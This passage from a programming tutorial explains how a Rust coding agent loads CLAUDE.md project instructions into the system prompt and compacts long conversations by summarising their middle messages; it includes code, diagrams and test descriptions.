CostTrackeraccumulates token usage across a session and computes estimated cost from per-million pricing. Itssummary()method produces the one-line status string the TUI displays. -
The merge strategy is the key design decision. Encoding "set vs unset" in the type system (instead of guessing from the value) guarantees last-write-wins and makes explicit resets -- clearing a list, re-asserting a default -- work correctly.
-
Environment variables are deliberately limited to three fields. Safety-critical settings like
blocked_commandsandprotected_patternsshould come from config files that are checked into source control or managed explicitly -- not from environment variables that might be manipulated.
What's next
Configuration tells the agent how to behave. Chapter 18 -- Project Instructions -- tells it what to know. The instructions field you saw in Config is just a string. The instruction system reads CLAUDE.md files from the project tree, merges them with user instructions, and injects them into the system prompt. Together, settings and instructions make the agent context-aware -- it adapts its behavior and knowledge to each project it works in.
Check yourself
← Chapter 16: Plan Mode · Contents · Chapter 18: Project Instructions →
Chapter 18: Project Instructions & Context Management
File(s) to edit:
src/context.rsTests to run:cargo test -p mini-claw-code-starter instructions(InstructionLoader),cargo test -p mini-claw-code-starter context_manager(ContextManager) Estimated time: 40 min
This chapter closes the loop on two pieces that keep an agent running over a long session:
InstructionLoader(built in Chapter 8) discovers CLAUDE.md files by walking up the filesystem. We revisit it here to see how its output gets injected into the conversation at session start.ContextManager(new in this chapter) keeps the conversation inside the model's context window by summarising old turns once the token budget is exceeded. This is the piece you fill in.
In Chapter 17 you added Config, a layered settings hierarchy. One of its
fields is instructions: Option<String> -- custom text the user can put in a
TOML config file and have injected into the system prompt.
This chapter wires all three together. It is the chapter where your agent
becomes project-aware (launching from /home/user/project/backend picks up
different CLAUDE.md files than /home/user/other) and session-durable (a
20-turn debugging session does not hit the context wall).
cargo test -p mini-claw-code-starter instructions # InstructionLoader
cargo test -p mini-claw-code-starter context_manager # ContextManager
Goal
- Understand how
InstructionLoaderoutput andConfig.instructionsget injected as system messages at session start. - Implement
ContextManager::recordso token usage from each turn accumulates into a running total. - Implement
ContextManager::compactso that once the budget is exceeded, the middle of the message history is replaced by an LLM-generated summary while the system prompt and the most recent messages are preserved intact. - Understand why the system prompt (which includes discovered CLAUDE.md content) must survive compaction unchanged -- it is the one message the LLM needs on every turn.
The session-level pipeline
Here is the complete flow. At session start instructions are discovered and
pushed into the message history. During the session the ContextManager
watches token usage and compacts the middle of that history once the budget
is exceeded.
┌─────────────────────────────┐
│ Filesystem │ (at session start)
│ │
│ /home/user/CLAUDE.md │──┐
│ /home/user/project/ │ │
│ CLAUDE.md │──┤ InstructionLoader::discover()
│ backend/ │ │ walks upward, collects paths
│ CLAUDE.md │──┤
│ .claw/instructions.md │──┘
└─────────────────────────────┘
│
▼
┌─────────────────────────────┐
│ InstructionLoader::load() │
│ concatenates with headers │
│ and --- separators │
└─────────────────────────────┘
│
▼
┌─────────────────────────────┐
│ messages[0] = System( │ (injected once, never edited)
│ "# Instructions from ... │
│ <concatenated CLAUDE>" │
│ ) │
└─────────────────────────────┘
│
▼ (agent loop: User → Assistant → ToolResult → ...)
│
┌─────────────────────────────┐
│ ContextManager │ (runs after every turn)
│ │
│ .record(usage) │ ← accumulate input + output tokens
│ .should_compact() │ ← tokens_used >= max_tokens?
│ │
│ On trigger: │
│ keep messages[0] │ ← the system/instructions message
│ ask provider to │
│ summarise middle │ ← LLM call with the old transcript
│ keep last N messages │
│ │
│ Result: short history, │
│ same system prompt. │
└─────────────────────────────┘
Two points to notice.
Instructions are stable within a session. They are loaded once, become the
first system message, and are never rewritten. Launch from a different
directory and you get a different messages[0], but once a session has
started the instruction content is fixed. Users generally do not edit
CLAUDE.md mid-chat.
Context management is session-level, not prompt-level. Compaction does not splice new sections into a "system prompt"; it rewrites the message history by summarising the middle. The system prompt (which carries your instructions) is deliberately excluded from compaction -- it is always the anchor.
Revisiting InstructionLoader
You built this in Chapter 8. Let's revisit the code now that we are using it in a real pipeline, because the design decisions matter more in context.
The struct
#![allow(unused)] fn main() { pub struct InstructionLoader { file_names: Vec<String>, } }
The loader does not hardcode which files to look for. It takes a list of file
names, and default_files() sets that list to ["CLAUDE.md", ".claw/instructions.md"]. This means you can swap in different file names
for testing, or add project-specific alternatives without modifying the loader.
#![allow(unused)] fn main() { impl InstructionLoader { pub fn new(file_names: &[&str]) -> Self { Self { file_names: file_names.iter().map(|s| s.to_string()).collect(), } } pub fn default_files() -> Self { Self::new(&["CLAUDE.md", ".claw/instructions.md"]) } } }
Discovery: the upward walk
flowchart BT
A["/home/user/project/backend/"] -->|check for CLAUDE.md| B["/home/user/project/"]
B -->|check for CLAUDE.md| C["/home/user/"]
C -->|check for CLAUDE.md| D["/home/"]
D -->|check for CLAUDE.md| E["/"]
A -.->|"found: backend/CLAUDE.md"| F["Collected paths<br/>(reversed to root-first)"]
B -.->|"found: project/CLAUDE.md"| F
C -.->|"found: user/CLAUDE.md"| F
discover() starts at the given directory and walks toward the filesystem
root. At each directory, it checks for every file name in the list:
#![allow(unused)] fn main() { pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> { let mut found = Vec::new(); let mut dir = Some(start_dir.to_path_buf()); while let Some(current) = dir { for name in &self.file_names { let candidate = current.join(name); if candidate.is_file() { found.push(candidate); } } dir = current.parent().map(|p| p.to_path_buf()); } found.reverse(); // Root-first order found } }
The found.reverse() at the end is the key design choice. The walk naturally
collects files from most-specific to most-general (start directory first, root
last). Reversing puts them in root-first order.
After discover("/home/user/project/backend") with CLAUDE.md files at three
levels, the vector is:
[0] /home/user/CLAUDE.md ← global preferences
[1] /home/user/project/CLAUDE.md ← project conventions
[2] /home/user/project/backend/CLAUDE.md ← subdirectory rules
Global preferences come first. The most specific rules come last. When the LLM reads the system prompt, the last instructions have the strongest influence -- the same principle as CSS specificity: general rules first, overrides last.
Loading: read, filter, join
load() calls discover(), reads each file, and concatenates the results:
#![allow(unused)] fn main() { pub fn load(&self, start_dir: &Path) -> Option<String> { let paths = self.discover(start_dir); if paths.is_empty() { return None; } let mut sections = Vec::new(); for path in &paths { if let Ok(content) = std::fs::read_to_string(path) { let content = content.trim().to_string(); if !content.is_empty() { sections.push(format!( "# Instructions from {}\n\n{}", path.display(), content )); } } } if sections.is_empty() { None } else { Some(sections.join("\n\n---\n\n")) } } }
Three details:
Headers. Each file's content is prefixed with # Instructions from <path>.
This tells the LLM where each block came from, helping it resolve
contradictions between levels.
Separators. Files are joined with \n\n---\n\n -- a horizontal rule in
markdown that gives the LLM a clear boundary between instruction blocks.
Empty file skipping. If a CLAUDE.md exists but is empty or whitespace-only, it is silently skipped. No point wasting context tokens on an empty section.
Returning None. If no instruction files are found, or all are empty,
load() returns None rather than Some(""). This lets the caller skip
adding an instructions section entirely.
The instruction hierarchy
Instructions can come from multiple sources. Here is the full hierarchy, from broadest to most specific:
Source Priority Section type
──────────────────────────────────────────────────────────────
/home/user/CLAUDE.md lowest file (root-first)
/home/user/project/CLAUDE.md ↓ file
/home/user/project/backend/CLAUDE.md ↓ file
.claw/instructions.md ↓ file (alternative)
Config.instructions highest config
File-based instructions are discovered by the InstructionLoader and appear
in root-first order. Config-based instructions come from the Config struct's
instructions field -- loaded from .claw/config.toml or
~/.config/mini-claw/config.toml.
Both become dynamic sections in the system prompt. File instructions are added first, config instructions second. Since the LLM reads the prompt top-to-bottom, config instructions have the final word when there is a conflict.
Why two sources?
CLAUDE.md files are committed to version control. They represent team
conventions that everyone on the project shares. "Run tests with cargo test."
"Never modify generated files." "Use edition 2024."
Config instructions are local. They live in .claw/config.toml (which may or
may not be committed) or in the user's home config directory (which is never
committed). They represent personal preferences or temporary overrides.
"Always explain your reasoning." "Focus on performance over readability for
this session."
Key Rust concept: Option chaining with if let for optional pipeline steps
The wiring code uses if let Some(instructions) = loader.load(...) to conditionally add sections. This pattern is idiomatic Rust for optional pipeline steps: InstructionLoader::load() returns Option<String> -- None when no instruction files exist, Some(text) when they do. The if let binding destructures the Option and only executes the body when there is a value. Similarly, Config.instructions is Option<String>, and if let Some(ref inst) = config.instructions only adds the section when the config has instructions. This means the prompt builder never adds empty sections -- the system prompt is exactly as long as it needs to be.
Wiring it together
Session startup is where InstructionLoader meets Config.instructions. Both
end up as system messages at the head of the conversation. In code:
#![allow(unused)] fn main() { let loader = InstructionLoader::default_files(); let mut messages: Vec<Message> = Vec::new(); // File-based instructions (CLAUDE.md, root-first). if let Some(instructions) = loader.load(Path::new(cwd)) { messages.push(Message::System(instructions)); } // Config-based instructions get the last word. if let Some(ref inst) = config.instructions { messages.push(Message::System(inst.clone())); } }
Message::System is the variant we have been using throughout the book for
the agent's instructions. Both sources become system messages at the head of
the history, in priority order: global → project → subdirectory → config. The
LLM reads them top-down, so later messages override earlier ones when they
disagree.
For this book we do not maintain a separate structured "prompt builder" that
tracks identity / safety / environment / instructions as named sections. A
production agent like Claude Code does: see the sidebar below for the shape
of that design. What matters for the rest of this chapter is that the
instructions are now sitting at the start of messages, and that the agent
loop never touches them again.
Sidebar: prompt builders in production agents (conceptual)
Claude Code and similar agents separate the system prompt into named sections -- identity, safety, tool schemas, environment, instructions -- and split the list across a cache boundary. Everything above the boundary is stable across turns and can be marked cacheable by the provider; everything below can change and is re-sent each turn.
Schematically (this is not in the starter):
# identity, safety, tool schemas ← cached prefix, stable across turns
# ──── cache boundary ─────────
# environment, instructions ← dynamic suffix, may change
This design wins real cost and latency: long stable prefixes are processed
once and reused. The starter does not model it explicitly because our
Message::System messages already live in a single list; provider-side
caching (when implemented) can key off the prefix of that list.
For the rest of the chapter we focus on what the starter does model:
keeping the conversation short enough to fit in the context window as the
session runs long. That job belongs to ContextManager.
ContextManager: the compaction algorithm
The starter's ContextManager lives in src/context.rs. It has three
responsibilities:
- Track token usage (
record): add the input + output tokens from each provider turn to a running counter. - Decide when to act (
should_compact): returntrueonce the counter hits the configured budget. - Rewrite history when asked (
compact): collapse old messages into a single LLM-generated summary while preserving the anchors.
The struct
#![allow(unused)] fn main() { pub struct ContextManager { max_tokens: u64, preserve_recent: usize, tokens_used: u64, } }
Two knobs, one piece of state.
max_tokens— the soft limit. Whentokens_usedreaches it, compaction triggers. Set this comfortably below the model's hard context limit so there is room for the next turn to complete before you shrink.preserve_recent— how many trailing messages survive compaction untouched. These carry the immediate conversational context -- the last user turn, the tool call you just made, the tool result you are about to reason about. Summarising them would break the next turn.tokens_used— the running total, updated byrecordafter every provider call.
Recording and triggering
record is tiny -- it just accumulates:
#![allow(unused)] fn main() { pub fn record(&mut self, usage: &TokenUsage) { self.tokens_used += usage.input_tokens + usage.output_tokens; } }
And should_compact compares against the budget:
#![allow(unused)] fn main() { pub fn should_compact(&self) -> bool { self.tokens_used >= self.max_tokens } }
The agent loop calls record after each provider turn and then
maybe_compact, which only invokes compact when the threshold is reached.
In practice this means compaction is rare: most turns are under budget and do
nothing.
Compaction: head + summary + tail
compact splits the message history into three slices:
messages = [ head | middle | recent ]
<-- keep ---->|<-- summarise->|<-- keep intact ->
- head — the leading
Message::System(if present). This is where the CLAUDE.md-derived instructions live. Always preserved. - middle — everything between head and the last
preserve_recentmessages. This is what gets summarised. - recent — the last
preserve_recentmessages. Always preserved.
The middle is rendered as a compact transcript ("User: ...",
"Assistant: ...", " [tool: name]", " Tool result: <preview>"), sent to
the provider with a short instruction ("Summarise in 2-3 sentences,
preserving key facts and decisions"), and the result becomes a single synthetic
system message: Message::System("[Conversation summary]: ...").
The reconstructed vector is [head, summary, ...recent]. A 40-message
conversation collapses to roughly 1 + 1 + preserve_recent messages.
The /= 3 token reset
After compaction we cannot know exactly how many tokens the new history uses without re-tokenising. But we know the new history is much shorter than the old one, so continuing to accumulate against the pre-compaction total would trigger another compaction immediately. A rough proxy:
#![allow(unused)] fn main() { self.tokens_used /= 3; }
Empirically, compacting a long history down to [system, summary, N recent]
reduces token count by roughly 3–5×. Dividing by 3 is a conservative estimate
that keeps the agent running until the real token count climbs back to the
budget. A more precise implementation would re-count tokens from the new
messages vector; the proxy is good enough for the starter and keeps the
code simple.
Why summarise instead of truncate?
The obvious alternative is to drop old messages outright. That is cheap (no extra LLM call) but loses information. If the user said "use snake_case throughout" on turn 3 and you drop it on turn 40, the agent forgets. A summary preserves the decisions and facts from the dropped range at the cost of one extra LLM roundtrip per compaction. Since compactions are rare, the tradeoff favours the summary.
Why a system message for the summary rather than a user or assistant one? Because the summary is meta-context, not something either speaker said. System framing tells the LLM "this is background, not an active speaking turn", which matches how it is meant to be used.
How Claude Code does it
Claude Code discovers CLAUDE.md files by walking up from the working directory, following the same upward-walk pattern we implemented. But its instruction system is more elaborate in several ways.
User-level instructions. Claude Code supports ~/.claude/CLAUDE.md as a
global instruction file. Our InstructionLoader achieves the same effect
naturally: if the upward walk reaches the home directory and finds a CLAUDE.md,
it gets included. No special case needed.
Settings-based tool rules. Claude Code's .claude/settings.json specifies
per-tool permission rules. These configure the permission engine (Chapter 13),
not the prompt. Our Config keeps it simpler with allowed_directory,
protected_patterns, and blocked_commands.
Memory files. Claude Code supports persistent memory that accumulates facts across sessions. Memory is loaded alongside instructions but managed separately. Our book stops before memory, but the instruction loader is the natural hook point for extending into it.
Instruction validation. Claude Code warns when instructions at different levels contradict each other. Our implementation trusts the LLM to resolve contradictions using the root-first ordering -- the more specific instruction wins because it appears later.
The core pattern is identical: discover files, load them in order, inject as dynamic prompt sections. Everything else is refinement.
Tests
Run the tests:
cargo test -p mini-claw-code-starter instructions # InstructionLoader
cargo test -p mini-claw-code-starter context_manager # ContextManager
Note: InstructionLoader tests live in instructions (built in Chapter 8 and
revisited here). ContextManager tests live in context_manager (added in
this chapter).
Key InstructionLoader tests (instructions):
- test_instructions_discover_in_current_dir -- Finds a CLAUDE.md in the start directory.
- test_instructions_discover_in_parent -- Walks upward and finds a CLAUDE.md in the parent directory.
- test_instructions_no_files_found -- Returns an empty list when no instruction files exist anywhere in the path.
- test_instructions_load_content --
load()returnsSomewith the file content included. - test_instructions_load_empty_file --
load()returnsNonefor an empty CLAUDE.md (no wasted tokens). - test_instructions_multiple_file_names -- Discovers both
CLAUDE.mdand.mini-claw/instructions.mdin the same directory. - test_instructions_system_prompt_section --
system_prompt_section()wraps content with a "project instructions" header. - test_instructions_default_files --
default_files()constructor does not panic.
Key context tests (context_manager):
- test_context_manager_below_threshold_no_compact -- Context manager does not trigger compaction when below the token threshold.
- test_context_manager_triggers_at_threshold -- Compaction triggers when recorded tokens exceed the threshold.
- test_context_manager_compact_preserves_system_prompt -- After compaction, the system prompt remains as the first message.
- test_context_manager_compact_preserves_recent -- The most recent N messages survive compaction intact.
Key takeaway
Instructions are injected once at session start and compaction runs on demand
mid-session. The system message at messages[0] is the anchor: it carries the
instructions that differentiate this project from any other, and it survives
every compaction unchanged so the agent never loses its grounding.
Recap
This chapter connected three pieces:
-
InstructionLoaderdiscovers CLAUDE.md files by walking up the filesystem and concatenates them root-first with headers and separators. Global preferences come first, subdirectory overrides come last. -
Config.instructionssupplies an optional second block of instructions from the layered config built in Chapter 17. It gets appended after the file-based block, so it has the final word. -
ContextManagertracks token usage and compacts the middle of the message history into an LLM-generated summary when the budget is exceeded. It preserves the leading system message (your instructions) and the trailingpreserve_recentmessages (your current conversational context).
The startup pipeline is: discover instruction files, build a Message::System
with their concatenated content, optionally append another Message::System
from Config.instructions, then run the normal agent loop. After every
provider turn the loop calls record and maybe_compact; in a short session
compaction never fires, in a long one it fires as many times as needed.
Where to go from here
This is the last chapter in the current series. The foundations are now in place: messages, provider, tools, agent loop, prompt, permissions, safety, hooks, plan mode, settings, and instructions.
Natural extensions to explore on your own:
- Persistent memory -- facts the agent learns in one session and recalls in the next. Memory files load alongside instructions, but they are managed differently: instructions are authored by humans, memory is authored by the agent itself.
- Token and cost tracking -- instrumenting the provider to aggregate per-session token usage and surface it in the TUI.
- Smarter compaction -- our
ContextManageruses a single summary pass and a rough/= 3token reset. Production-grade alternatives include hierarchical summaries (summary of summaries) and re-tokenising the new history for an exact count. - Sessions and resume -- serializing the message history to disk so a conversation can be paused and resumed.
- MCP (Model Context Protocol) -- loading tools from external MCP servers at runtime instead of hardcoding them at startup.
- Subagents -- spawning child agents with a filtered tool set for scoped subtasks.